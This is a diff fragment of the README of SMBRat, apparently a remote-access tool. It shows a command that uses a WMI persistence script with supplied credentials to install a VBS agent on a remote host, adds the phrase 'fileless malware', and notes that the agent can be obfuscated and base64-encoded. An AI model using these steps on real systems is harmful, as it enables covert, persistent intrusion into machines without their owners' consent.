operatorequals/SMBRat/README.md

 $ examples/wmipersist.py '<username>:<password>@<hostname/ipaddress>' install -vbs agent.vbs -name smbrat -timer 10
 ```

-It is also possible to utilize the `WMI` tool by local access to install the `agent.vbs`
+It is also possible to utilize the `WMI` tool by local access to install the `agent.vbs` as fileless malware.

 ### Obfuscation?
 Visual Basic Scripts can be nicely *obfuscated*, *base64*'d as well as *minified*.